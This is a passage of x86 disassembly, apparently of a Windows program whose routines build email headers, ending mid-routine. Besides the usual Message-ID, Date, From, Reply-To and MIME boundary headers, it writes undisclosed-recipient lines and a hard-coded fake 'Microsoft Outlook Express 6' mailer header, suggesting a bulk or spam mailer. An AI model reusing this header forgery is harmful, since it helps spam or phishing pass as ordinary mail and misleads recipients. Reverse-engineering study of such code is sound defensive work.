call sub_411F32 ; gethostbyname
test eax, eax
mov edi, dword_4241DC
jz short loc_4142D8
mov edx, [eax+0Ch]
mov eax, [edx]
mov eax, [eax]
push eax
push offset a08x ; "%08x"
lea ecx, [esp+12Ch+var_84]
push 80h
push ecx
call edi
add esp, 10h
jmp short loc_4142F0
; ---------------------------------------------------------------------------
loc_4142D8: ; CODE XREF: sub_414280+35�j
push 80h
push offset aLocalhost ; "LocalHost"
lea edx, [esp+12Ch+var_84]
push edx
call dword_42407C ; lstrcpyn
loc_4142F0: ; CODE XREF: sub_414280+56�j
lea eax, [esp+124h+var_114]
push eax
call dword_4240D4 ; GetSystemTime
lea ecx, [esp+124h+var_11C]
push ecx
lea edx, [esp+128h+var_114]
push edx
call dword_4240D0 ; SystemTimeToFileTime
mov eax, dword_430ABC
add eax, 0Bh
push 80h
mov dword_430ABC, eax
call sub_4191C1
mov edx, [esp+128h+var_11C]
mov esi, eax
lea eax, [esp+128h+var_104]
push eax
mov eax, [esp+12Ch+var_118]
lea ecx, [esp+12Ch+var_84]
push ecx
mov ecx, dword_430ABC
push edx
push eax
push ecx
push offset aMessageId04x08 ; "Message-ID: <%04x%08.8lx$%08.8lx$%s@%s>"...
push 80h
push esi
call edi
mov ecx, [esp+148h+var_4]
add esp, 24h
pop edi
mov eax, esi
pop esi
call sub_4192B6
add esp, 11Ch
retn
sub_414280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414370 proc near ; CODE XREF: sub_412860+156�p
; sub_414690+166�p ...
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0FFFFFFFFh
push offset SEH_414370
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 34h
push ebx
push ebp
xor eax, eax
push esi
push edi
mov [esp+50h+var_30], eax
mov [esp+50h+var_2C], eax
mov [esp+50h+var_28], eax
mov [esp+50h+var_4], eax
mov [esp+50h+var_18], eax
mov [esp+50h+var_14], eax
mov [esp+50h+var_10], eax
mov [esp+50h+var_24], eax
mov [esp+50h+var_20], eax
mov [esp+50h+var_1C], eax
mov ebp, [esp+50h+arg_0]
push ebp
mov byte ptr [esp+54h+var_4], 2
call dword_424094 ; lstrlen
mov ebx, eax
lea eax, [ebx+1]
push eax
lea ecx, [esp+54h+var_24]
call sub_412000
mov edx, [esp+50h+var_20]
mov eax, [esp+50h+var_24]
lea edi, [edx+eax]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
mov esi, ebp
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset byte_4243C3
mov byte ptr [ebx+eax], 0
mov [esp+54h+var_20], ebx
call dword_424094 ; lstrlen
mov [esp+50h+var_2C], eax
inc eax
push eax
mov [esp+54h+var_28], eax
call sub_4191C1
mov ebx, eax
mov eax, offset byte_4243C3
mov esi, ebx
add esp, 4
mov [esp+50h+var_30], ebx
sub esi, eax
loc_414426: ; CODE XREF: sub_414370+BE�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_414426
mov edi, ebp
mov [esp+50h+var_40], edi
loc_414436: ; CODE XREF: sub_414370+2AD�j
push 20h
push ebp
mov esi, ebp
call sub_41A3F0
mov ebp, eax
add esp, 8
test ebp, ebp
jz short loc_414477
lea esp, [esp+0]
loc_414450: ; CODE XREF: sub_414370+105�j
mov edx, [esp+50h+arg_8]
mov eax, ebp
sub eax, edi
add eax, edx
cmp eax, 4Bh
jge loc_4144DF
mov esi, ebp
push 20h
inc ebp
push ebp
call sub_41A3F0
mov ebp, eax
add esp, 8
test ebp, ebp
jnz short loc_414450
loc_414477: ; CODE XREF: sub_414370+D7�j
; sub_414370+177�j
push edi
call dword_424094 ; lstrlen
mov esi, eax
mov eax, [esp+50h+var_2C]
lea ebx, [eax+esi]
lea ecx, [ebx+1]
push ecx
lea ecx, [esp+54h+var_30]
call sub_412000
mov ebp, [esp+50h+var_30]
mov edx, [esp+50h+var_2C]
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, edi
lea edi, [edx+ebp]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+50h+arg_4]
test ecx, ecx
mov byte ptr [ebx+ebp], 0
mov [esp+50h+var_2C], ebx
jnz loc_414622
mov edx, [esp+50h+arg_0]
mov eax, ebp
sub edx, ebp
lea ecx, [ecx+0]
loc_4144D0: ; CODE XREF: sub_414370+168�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4144D0
jmp loc_414643
; ---------------------------------------------------------------------------
loc_4144DF: ; CODE XREF: sub_414370+ED�j
cmp esi, edi
jz short loc_4144E5
mov ebp, esi
loc_4144E5: ; CODE XREF: sub_414370+171�j
test ebp, ebp
jz short loc_414477
mov ecx, [esp+50h+var_2C]
mov esi, ebp
sub esi, edi
lea eax, [ecx+esi]
mov ecx, [esp+50h+var_28]
mov [esp+50h+var_3C], eax
inc eax
cmp eax, ecx
mov [esp+50h+var_38], esi
jbe short loc_414556
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [esp+54h+var_28], eax
call sub_4191C1
add esp, 4
test ebx, ebx
mov [esp+50h+var_34], eax
jz short loc_414550
mov ecx, [esp+50h+var_2C]
inc ecx
mov edx, ecx
shr ecx, 2
mov edi, eax
mov esi, ebx
rep movsd
mov ecx, edx
and ecx, 3
push ebx
rep movsb
call sub_41930D
mov edi, [esp+54h+var_40]
mov esi, [esp+54h+var_38]
mov eax, [esp+54h+var_34]
add esp, 4
loc_414550: ; CODE XREF: sub_414370+1B2�j
mov ebx, eax
mov [esp+50h+var_30], ebx
loc_414556: ; CODE XREF: sub_414370+193�j
mov eax, [esp+50h+var_2C]
mov ecx, esi
mov edx, ecx
mov esi, edi
shr ecx, 2
lea edi, [eax+ebx]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edi, [esp+50h+var_3C]
push offset asc_42491C ; "\r\n "
mov byte ptr [edi+ebx], 0
mov [esp+54h+var_2C], edi
call dword_424094 ; lstrlen
mov ecx, [esp+50h+var_28]
mov esi, eax
lea eax, [esi+edi]
mov [esp+50h+var_40], eax
inc eax
cmp eax, ecx
mov [esp+50h+var_34], esi
jbe short loc_4145EB
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [esp+54h+var_28], eax
call sub_4191C1
add esp, 4
test ebx, ebx
mov [esp+50h+var_38], eax
jz short loc_4145E5
lea ecx, [edi+1]
mov edi, eax
mov eax, ecx
shr ecx, 2
mov esi, ebx
rep movsd
mov ecx, eax
and ecx, 3
push ebx
rep movsb
call sub_41930D
mov edi, [esp+54h+var_3C]
mov esi, [esp+54h+var_34]
mov eax, [esp+54h+var_38]
add esp, 4
loc_4145E5: ; CODE XREF: sub_414370+249�j
mov ebx, eax
mov [esp+50h+var_30], ebx
loc_4145EB: ; CODE XREF: sub_414370+22A�j
mov eax, [esp+50h+var_40]
mov ecx, esi
mov edx, ecx
shr ecx, 2
add edi, ebx
mov esi, offset asc_42491C ; "\r\n "
rep movsd
mov ecx, edx
and ecx, 3
inc ebp
rep movsb
mov byte ptr [eax+ebx], 0
mov [esp+50h+var_2C], eax
mov [esp+50h+arg_8], 1
mov [esp+50h+var_40], ebp
mov edi, ebp
jmp loc_414436
; ---------------------------------------------------------------------------
loc_414622: ; CODE XREF: sub_414370+14F�j
mov eax, [ecx+8]
test eax, eax
mov dword ptr [ecx+4], 0
jz short loc_414635
mov edx, [ecx]
mov byte ptr [edx], 0
loc_414635: ; CODE XREF: sub_414370+2BE�j
test ebx, ebx
jz short loc_414643
lea eax, [esp+50h+var_30]
push eax
call sub_412810
loc_414643: ; CODE XREF: sub_414370+16A�j
; sub_414370+2C7�j
mov eax, [esp+50h+var_24]
test eax, eax
mov byte ptr [esp+50h+var_4], 1
jz short loc_414659
push eax
call sub_41930D
add esp, 4
loc_414659: ; CODE XREF: sub_414370+2DE�j
test ebp, ebp
mov [esp+50h+var_4], 0FFFFFFFFh
jz short loc_41466E
push ebp
call sub_41930D
add esp, 4
loc_41466E: ; CODE XREF: sub_414370+2F3�j
mov ecx, [esp+50h+var_C]
pop edi
pop esi
pop ebp
pop ebx
mov large fs:0, ecx
add esp, 40h
retn
sub_414370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414690 proc near ; CODE XREF: sub_413410+16A�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_18 = dword ptr 1Ch
arg_1C = dword ptr 20h
arg_20 = dword ptr 24h
arg_24 = dword ptr 28h
arg_28 = dword ptr 2Ch
arg_34 = dword ptr 38h
arg_40 = dword ptr 44h
arg_44 = dword ptr 48h
arg_48 = dword ptr 4Ch
arg_4C = dword ptr 50h
arg_50 = dword ptr 54h
arg_54 = dword ptr 58h
arg_58 = dword ptr 5Ch
arg_5C = dword ptr 60h
arg_60 = dword ptr 64h
arg_64 = dword ptr 68h
arg_68 = dword ptr 6Ch
arg_6C = dword ptr 70h
arg_70 = dword ptr 74h
arg_74 = dword ptr 78h
arg_78 = dword ptr 7Ch
arg_7C = dword ptr 80h
arg_80 = dword ptr 84h
arg_84 = dword ptr 88h
arg_88 = dword ptr 8Ch
arg_104 = dword ptr 108h
arg_108 = byte ptr 10Ch
arg_158 = dword ptr 15Ch
arg_188 = byte ptr 18Ch
arg_18C = byte ptr 190h
arg_1A4 = byte ptr 1A8h
arg_1A8 = byte ptr 1ACh
arg_1AC = dword ptr 1B0h
arg_1B0 = byte ptr 1B4h
arg_1B8 = byte ptr 1BCh
arg_1B9 = byte ptr 1BDh
arg_2184 = dword ptr 2188h
arg_2188 = dword ptr 218Ch
arg_2190 = dword ptr 2194h
arg_21A8 = dword ptr 21ACh
arg_21AC = byte ptr 21B0h
arg_21B8 = dword ptr 21BCh
arg_21C4 = dword ptr 21C8h
push 0FFFFFFFFh
push offset SEH_414690
mov eax, large fs:0
push eax
mov eax, 21CCh
mov large fs:0, esp
call sub_4192D0
mov eax, dword_42A290
push ebx
push ebp
push esi
push edi
xor edi, edi
mov [esp+1Ch+arg_21B8], eax
mov [esp+1Ch+arg_10], edi
mov [esp+1Ch+arg_14], edi
mov [esp+1Ch+arg_18], edi
mov [esp+1Ch+arg_21C4], edi
mov [esp+1Ch+arg_50], edi
mov [esp+1Ch+arg_54], edi
mov [esp+1Ch+arg_58], edi
mov [esp+1Ch+arg_80], edi
mov [esp+1Ch+arg_84], edi
mov [esp+1Ch+arg_88], edi
mov [esp+1Ch+arg_68], edi
mov [esp+1Ch+arg_6C], edi
mov [esp+1Ch+arg_70], edi
mov [esp+1Ch+arg_74], edi
mov [esp+1Ch+arg_78], edi
mov [esp+1Ch+arg_7C], edi
mov [esp+1Ch+arg_5C], edi
mov [esp+1Ch+arg_60], edi
mov [esp+1Ch+arg_64], edi
mov [esp+1Ch+arg_44], edi
mov [esp+1Ch+arg_48], edi
mov [esp+1Ch+arg_4C], edi
mov [esp+1Ch+var_8], edi
mov [esp+1Ch+var_4], edi
mov [esp+1Ch], edi
mov byte ptr [esp+1Ch+arg_21C4], 7
call sub_414280
mov [esp+1Ch+arg_20], eax
cmp dword_430528, edi
mov byte_430AC1, 0
jz short loc_41477F
cmp dword_43052C, edi
mov dword_430528, edi
jz short loc_41477F
mov eax, dword_430524
mov byte ptr [eax], 0
loc_41477F: ; CODE XREF: sub_414690+D7�j
; sub_414690+E5�j
mov al, byte_42B100
test al, al
jz short loc_4147CD
mov esi, off_429FAC
mov eax, offset byte_42B100
loc_414793: ; CODE XREF: sub_414690+125�j
mov dl, [eax]
mov bl, [esi]
mov cl, dl
cmp dl, bl
jnz short loc_4147BB
test cl, cl
jz short loc_4147B7
mov dl, [eax+1]
mov bl, [esi+1]
mov cl, dl
cmp dl, bl
jnz short loc_4147BB
add eax, 2
add esi, 2
test cl, cl
jnz short loc_414793
loc_4147B7: ; CODE XREF: sub_414690+10F�j
xor eax, eax
jmp short loc_4147C0
; ---------------------------------------------------------------------------
loc_4147BB: ; CODE XREF: sub_414690+10B�j
; sub_414690+11B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4147C0: ; CODE XREF: sub_414690+129�j
cmp eax, edi
jz short loc_4147EA
mov byte_42AEE9, 1
jmp short loc_4147EA
; ---------------------------------------------------------------------------
loc_4147CD: ; CODE XREF: sub_414690+F6�j
mov eax, off_429FAC
mov edx, offset byte_42B100
sub edx, eax
lea esp, [esp+0]
loc_4147E0: ; CODE XREF: sub_414690+158�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4147E0
loc_4147EA: ; CODE XREF: sub_414690+132�j
; sub_414690+13B�j
push 6
lea eax, [esp+20h+arg_50]
push eax
push offset byte_42B128
call sub_414370
push 6
lea ecx, [esp+2Ch+arg_80]
push ecx
push offset byte_42B850
call sub_414370
push 0Ah
lea edx, [esp+38h+arg_68]
push edx
push offset byte_42B958
call sub_414370
push 8
lea eax, [esp+44h+arg_74]
push eax
push offset byte_42AEF0
call sub_414370
push 0Ah
lea ecx, [esp+50h+arg_5C]
push ecx
push offset byte_42BC70
call sub_414370
mov al, byte_42BA60
add esp, 3Ch
test al, al
jz loc_4148EA
push offset byte_42BA60
lea edx, [esp+20h+arg_1B8]
push offset aS ; "<%s>"
push edx
call sub_419B8A
lea eax, [esp+28h+arg_1B9]
push 3Ch
push eax
call sub_41A3F0
add esp, 14h
cmp eax, edi
jz short loc_4148C0
jmp short loc_414890
; ---------------------------------------------------------------------------
align 10h
loc_414890: ; CODE XREF: sub_414690+1F8�j
; sub_414690+22E�j
lea edx, [esp+1Ch+arg_1B8]
sub edx, eax
lea esp, [esp+0]
loc_4148A0: ; CODE XREF: sub_414690+218�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4148A0
lea ecx, [esp+1Ch+arg_1B9]
push 3Ch
push ecx
call sub_41A3F0
add esp, 8
cmp eax, edi
jnz short loc_414890
loc_4148C0: ; CODE XREF: sub_414690+1F6�j
lea edx, [esp+1Ch+arg_1B8]
push 3Eh
push edx
call sub_41A3F0
mov byte ptr [eax+1], 0
push 0Dh
lea eax, [esp+28h+arg_44]
push eax
lea ecx, [esp+2Ch+arg_1B8]
push ecx
call sub_414370
add esp, 14h
loc_4148EA: ; CODE XREF: sub_414690+1C5�j
lea edx, [esp+1Ch+arg_24]
push edx
call dword_424138 ; GetLocalTime
lea eax, [esp+20h+arg_108]
push eax
call dword_424134 ; GetTimeZoneInformation
mov edi, eax
mov eax, [esp+24h+arg_104]
cdq
mov ecx, 3Ch
idiv ecx
cmp edi, 1
mov edi, 3Ch
mov ecx, eax
mov eax, [esp+24h+arg_158]
mov esi, edx
jz short loc_414930
mov eax, [esp+24h+arg_1AC]
loc_414930: ; CODE XREF: sub_414690+297�j
cdq
idiv edi
add ecx, eax
add esi, edx
movzx edx, word ptr [esp+24h+arg_28]
neg ecx
mov eax, esi
neg eax
push eax
push ecx
push edx
movzx edx, word ptr [esp+30h+arg_1C]
mov [esp+30h+var_4], eax
movzx eax, word ptr [esp+30h+arg_24+2]
push eax
movzx eax, word ptr [esp+34h+arg_1C+2]
mov [esp+34h+var_14], ecx
movzx ecx, word ptr [esp+34h+arg_24]
push ecx
mov ecx, off_429FD0[eax*4]
movzx eax, word ptr [esp+38h+arg_20]
push edx
movzx edx, word ptr [esp+3Ch+arg_20+2]
push ecx
mov ecx, off_429FB0[eax*4]
push edx
push ecx
lea edx, [esp+48h+arg_1B0]
push offset aDateS_2dS_4d_2 ; "Date: %s, %.2d %s %.4d %.2d:%.2d:%.2d %"...
push edx
call sub_419B8A
mov ebx, [esp+50h+arg_21C4]
mov edi, [ebx+4]
mov ebp, dword_424094
add esp, 2Ch
lea eax, [esp+24h+arg_1B0]
push eax
mov [esp+28h+arg_14], edi
call ebp ; lstrlen
mov esi, eax
mov eax, [edi+4]
add eax, esi
mov [esp+28h+var_4], eax
inc eax
push eax
mov ecx, edi
call sub_412000
mov eax, [esp+28h+arg_10]
mov edx, [eax]
mov edi, [edi+4]
mov ecx, esi
add edi, edx
mov edx, ecx
shr ecx, 2
lea esi, [esp+28h+arg_1AC]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edx, [eax]
mov ecx, [esp+28h+var_4]
mov byte ptr [ecx+edx], 0
mov [eax+4], ecx
mov al, byte_42B128
test al, al
mov eax, [esp+28h+arg_44]
jnz short loc_414A09
mov eax, [esp+28h+arg_74]
loc_414A09: ; CODE XREF: sub_414690+370�j
push eax
lea eax, [esp+2Ch+arg_1AC]
push offset aFromS ; "From: %s\r\n"
push eax
call sub_419B8A
mov edi, [ebx+4]
add esp, 0Ch
lea ecx, [esp+28h+arg_1AC]
push ecx
mov [esp+2Ch+var_4], edi
call ebp ; lstrlen
mov esi, eax
mov eax, [edi+4]
add eax, esi
mov [esp+2Ch+arg_C], eax
inc eax
push eax
mov ecx, edi
call sub_412000
mov eax, [esp+2Ch+var_8]
mov edx, [eax+4]
mov edi, [edi]
mov ecx, esi
add edi, edx
mov edx, ecx
shr ecx, 2
lea esi, [esp+2Ch+arg_1A8]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [esp+2Ch+arg_C]
mov edx, [eax]
mov byte ptr [ecx+edx], 0
mov [eax+4], ecx
mov eax, [ebx+14h]
mov ecx, [eax+4]
test ecx, ecx
jz short loc_414AE7
mov ecx, [esp+2Ch+var_C]
mov edx, [esp+2Ch+var_1C]
push ecx
movzx ecx, word ptr [esp+30h+arg_20]
push edx
movzx edx, word ptr [esp+34h+arg_1C+2]
mov eax, [eax]
push ecx
movzx ecx, word ptr [esp+38h+arg_1C]
push edx
movzx edx, word ptr [esp+3Ch+arg_14]
push ecx
movzx ecx, word ptr [esp+40h+arg_14+2]
push edx
mov edx, off_429FD0[ecx*4]
movzx ecx, word ptr [esp+44h+arg_18+2]
push edx
movzx edx, word ptr [esp+48h+arg_18]
push ecx
mov ecx, off_429FB0[edx*4]
push ecx
push eax
lea edx, [esp+54h+arg_1A8]
push offset aSS_2dS_2d_2d_2 ; "%s%s, %.2d %s %.2d %.2d:%.2d:%.2d %+03d"...
push edx
call sub_419B8A
mov ecx, [ebx+4]
add esp, 30h
lea eax, [esp+2Ch+arg_1A8]
push eax
call sub_4120B0
loc_414AE7: ; CODE XREF: sub_414690+3EB�j
mov al, byte_430AB6
test al, al
mov esi, [esp+2Ch+arg_58]
jz short loc_414B2E
push esi
lea ecx, [esp+30h+arg_1A8]
push offset aSenderS ; "Sender: %s\r\n"
push ecx
call sub_419B8A
mov ecx, [ebx+4]
add esp, 0Ch
lea edx, [esp+2Ch+arg_1A8]
push edx
call sub_4120B0
mov al, byte_42BD78
test al, al
jz short loc_414B97
push esi
push offset aReplyToS_0 ; "Reply-to: %s\r\n"
jmp short loc_414B77
; ---------------------------------------------------------------------------
loc_414B2E: ; CODE XREF: sub_414690+465�j
mov al, byte_42AEF0
test al, al
jz short loc_414B64
mov edx, [esp+2Ch+arg_64]
push edx
lea eax, [esp+30h+arg_1A8]
push offset aSenderS ; "Sender: %s\r\n"
push eax
call sub_419B8A
add esp, 0Ch
lea ecx, [esp+2Ch+arg_1A8]
push ecx
mov ecx, [ebx+4]
call sub_4120B0
loc_414B64: ; CODE XREF: sub_414690+4A5�j
mov al, byte_42BC70
test al, al
jz short loc_414B97
mov edx, [esp+2Ch+arg_4C]
push edx
push offset aReplyToS ; "Reply-To: %s\r\n"
loc_414B77: ; CODE XREF: sub_414690+49C�j
lea eax, [esp+34h+arg_1A8]
push eax
call sub_419B8A
lea ecx, [esp+38h+arg_1A8]
add esp, 0Ch
push ecx
mov ecx, [ebx+4]
call sub_4120B0
loc_414B97: ; CODE XREF: sub_414690+494�j
; sub_414690+4DB�j
mov eax, [ebx+10h]
xor esi, esi
cmp eax, esi
jz loc_414D14
cmp dword_430504, esi
jz short loc_414BFB
mov eax, dword_430500
push 4
lea edx, [esp+30h+arg_0]
push edx
push eax
call sub_414370
mov ecx, [ebx+4]
add esp, 0Ch
push offset aTo ; "To: "
call sub_4120B0
lea ecx, [esp+2Ch+arg_0]
push ecx
mov ecx, [ebx+4]
call sub_412810
mov ecx, [ebx+4]
push offset word_42465C
call sub_4120B0
cmp [esp+2Ch+arg_8], esi
mov [esp+2Ch+arg_4], esi
jz short loc_414C19
mov edx, [esp+2Ch+arg_0]
mov byte ptr [edx], 0
jmp short loc_414C19
; ---------------------------------------------------------------------------
loc_414BFB: ; CODE XREF: sub_414690+51A�j
cmp dword_430540, esi
jnz short loc_414C21
mov al, byte_430ABB
test al, al
jz short loc_414C6F
mov ecx, [ebx+4]
push offset aToUndisclosedR ; "To: Undisclosed recipients:;\r\n"
call sub_4120B0
loc_414C19: ; CODE XREF: sub_414690+560�j
; sub_414690+569�j
cmp dword_430540, esi
jz short loc_414C6F
loc_414C21: ; CODE XREF: sub_414690+571�j
mov ecx, dword_43053C
push 4
lea eax, [esp+30h+arg_0]
push eax
push ecx
call sub_414370
mov ecx, [ebx+4]
add esp, 0Ch
push offset aCc ; "Cc: "
call sub_4120B0
mov ecx, [ebx+4]
lea edx, [esp+2Ch+arg_0]
push edx
call sub_412810
mov ecx, [ebx+4]
push offset word_42465C
call sub_4120B0
cmp [esp+2Ch+arg_8], esi
mov [esp+2Ch+arg_4], esi
jz short loc_414C6F
mov eax, [esp+2Ch+arg_0]
mov byte ptr [eax], 0
loc_414C6F: ; CODE XREF: sub_414690+57A�j
; sub_414690+58F�j ...
mov al, byte_430AB8
test al, al
jz short loc_414CB1
mov al, byte_42BC70
test al, al
mov eax, offset byte_42BC70
jnz short loc_414C8B
mov eax, offset byte_42B958
loc_414C8B: ; CODE XREF: sub_414690+5F4�j
push eax
lea ecx, [esp+30h+arg_1A8]
push offset aDispositionNot ; "Disposition-Notification-To: %s\r\n"
push ecx
call sub_419B8A
mov ecx, [ebx+4]
add esp, 0Ch
lea edx, [esp+2Ch+arg_1A8]
push edx
call sub_4120B0
loc_414CB1: ; CODE XREF: sub_414690+5E6�j
mov al, byte_430AB7
test al, al
jz short loc_414CF3
mov al, byte_42BC70
test al, al
mov eax, offset byte_42BC70
jnz short loc_414CCD
mov eax, offset byte_42B958
loc_414CCD: ; CODE XREF: sub_414690+636�j
push eax
lea eax, [esp+30h+arg_1A8]
push offset aReturnReceiptT ; "Return-Receipt-To: %s\r\n"
push eax
call sub_419B8A
add esp, 0Ch
lea ecx, [esp+2Ch+arg_1A8]
push ecx
mov ecx, [ebx+4]
call sub_4120B0
loc_414CF3: ; CODE XREF: sub_414690+628�j
mov al, byte_430AB4
cmp al, 30h
jnz short loc_414D03
push offset aXMsmailPriorit ; "X-MSMail-Priority: Low\r\nX-Priority: 5\r\n"...
jmp short loc_414D0C
; ---------------------------------------------------------------------------
loc_414D03: ; CODE XREF: sub_414690+66A�j
cmp al, 31h
jnz short loc_414D14
push offset aXMsmailPrior_0 ; "X-MSMail-Priority: High\r\nX-Priority: 1\r"...
loc_414D0C: ; CODE XREF: sub_414690+671�j
mov ecx, [ebx+4]
call sub_4120B0
loc_414D14: ; CODE XREF: sub_414690+50E�j
; sub_414690+675�j
mov al, byte_42BA60
test al, al
jz short loc_414D47
mov edx, [esp+2Ch+arg_34]
push edx
lea eax, [esp+30h+arg_1A8]
push offset aReturnPathS ; "Return-Path: %s\r\n"
push eax
call sub_419B8A
add esp, 0Ch
lea ecx, [esp+2Ch+arg_1A8]
push ecx
mov ecx, [ebx+4]
call sub_4120B0
loc_414D47: ; CODE XREF: sub_414690+68B�j
mov al, byte_430ABA
test al, al
jz short loc_414D5F
push offset aUserAgentMicro ; "User-Agent: Microsoft Outlook Express 6"...
lea edx, [esp+30h+arg_1A8]
push edx
jmp short loc_414D6C
; ---------------------------------------------------------------------------
loc_414D5F: ; CODE XREF: sub_414690+6BE�j
push offset aXMailerMicroso ; "X-Mailer: Microsoft Outlook Express 6.0"...
lea eax, [esp+30h+arg_1A8]
push eax
loc_414D6C: ; CODE XREF: sub_414690+6CD�j
call sub_419B8A
mov edi, [ebx+4]
add esp, 8
lea ecx, [esp+2Ch+arg_1A8]
push ecx
mov [esp+30h+var_1C], edi
call ebp ; lstrlen
mov esi, eax
mov eax, [edi+4]
add eax, esi
mov [esp+30h+var_10], eax
inc eax
push eax
mov ecx, edi
call sub_412000
mov edi, [edi+4]
mov eax, [esp+30h+var_20]
mov edx, [eax]
mov ecx, esi
add edi, edx
mov edx, ecx
shr ecx, 2
lea esi, [esp+30h+arg_1A4]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edx, [eax]
mov ecx, [esp+30h+var_10]
mov byte ptr [ecx+edx], 0
mov [eax+4], ecx
mov eax, [ebx+28h]
push eax
call sub_416350
mov ecx, [esp+34h+arg_C]
mov edi, [ebx+4]
add esp, 4
push ecx
mov [esp+34h+var_20], edi
call ebp ; lstrlen
mov esi, eax
mov eax, [edi+4]
add eax, esi
mov [esp+34h+var_14], eax
inc eax
push eax
mov ecx, edi
call sub_412000
mov eax, [esp+34h+var_24]
mov edx, [eax+4]
mov edi, [edi]
mov ecx, esi
mov esi, [esp+34h+arg_8]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edx, [eax]
mov ecx, [esp+34h+var_14]
mov byte ptr [ecx+edx], 0
mov [eax+4], ecx
mov eax, [esp+34h+arg_8]
push eax
call sub_41930D
mov al, byte_42BE88
add esp, 4
test al, al
jz loc_414F8A
xor edi, edi
mov [esp+34h+arg_1C], edi
mov [esp+34h+arg_20], edi
mov [esp+34h+arg_24], edi
mov [esp+34h+var_10], edi
push offset byte_42BE88
mov [esp+38h+arg_21AC], 9
call ebp ; lstrlen
mov [esp+38h+var_10], eax
inc eax
push eax
mov [esp+3Ch+var_C], eax
call sub_4191C1
mov ecx, offset byte_42BE88
mov esi, eax
add esp, 4
mov [esp+38h+var_14], eax
sub esi, ecx
lea esp, [esp+0]
loc_414E80: ; CODE XREF: sub_414690+7F8�j
mov al, [ecx]
mov [ecx+esi], al
inc ecx
test al, al
jnz short loc_414E80
mov ecx, [ebx+4]
push offset aSubject ; "Subject: "
call sub_4120B0
mov eax, [ebx+3Ch]
cmp eax, edi
jz short loc_414EEE
cmp byte ptr [eax], 0
jz short loc_414EEE
push offset asc_424A20 ; " \""
lea ecx, [esp+3Ch+var_14]
call sub_4120B0
mov ecx, [ebx+3Ch]
push ecx
call sub_411F80
add esp, 4
push eax
lea ecx, [esp+3Ch+var_14]
call sub_4120B0
mov esi, [esp+38h+var_10]
inc esi
lea edx, [esi+1]
push edx
lea ecx, [esp+3Ch+var_14]
call sub_412000
mov ecx, [esp+38h+var_14]
mov edx, [esp+38h+var_10]
mov al, 22h
mov [edx+ecx], al
mov byte ptr [esi+ecx], 0
mov [esp+38h+var_10], esi
loc_414EEE: ; CODE XREF: sub_414690+80C�j
; sub_414690+811�j
mov ecx, [esp+38h+var_14]
push 9
lea eax, [esp+3Ch+arg_18]
push eax
push ecx
call sub_414370
mov edi, [ebx+4]
mov eax, [edi+4]
mov esi, [esp+44h+arg_1C]
add eax, esi
add esp, 0Ch
mov [esp+38h+var_18], eax
inc eax
push eax
mov ecx, edi
mov [esp+3Ch+var_28], edi
call sub_412000
mov edi, [edi+4]
mov eax, [esp+38h+var_28]
mov edx, [eax]
mov ecx, esi
mov esi, [esp+38h+arg_18]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [esp+38h+var_18]
mov edx, [eax]
mov byte ptr [ecx+edx], 0
mov [eax+4], ecx
mov ecx, [ebx+4]
push offset word_42465C
call sub_4120B0
mov eax, [esp+38h+var_14]
test eax, eax
mov byte ptr [esp+38h+arg_21A8], 8
jz short loc_414F71
push eax
call sub_41930D
add esp, 4
loc_414F71: ; CODE XREF: sub_414690+8D6�j
mov eax, [esp+38h+arg_18]
test eax, eax
mov byte ptr [esp+38h+arg_21A8], 7
jz short loc_414F8A
push eax
call sub_41930D
add esp, 4
loc_414F8A: ; CODE XREF: sub_414690+7A6�j
; sub_414690+8EF�j
lea ecx, [esp+38h+arg_18]
push ecx
call dword_4240D4 ; GetSystemTime
lea edx, [esp+3Ch+var_18]
push edx
lea eax, [esp+40h+arg_14]
push eax
call dword_4240D0 ; SystemTimeToFileTime
mov ecx, [esp+44h+var_20]
mov eax, dword_430ABC
mov edx, [esp+44h+var_1C]
push ecx
push edx
add eax, 0FFFFFFFCh
push eax
push 0
push offset a_nextpart_03d_ ; "----=_NextPart_%03d_%04X_%08.8lX.%08.8l"...
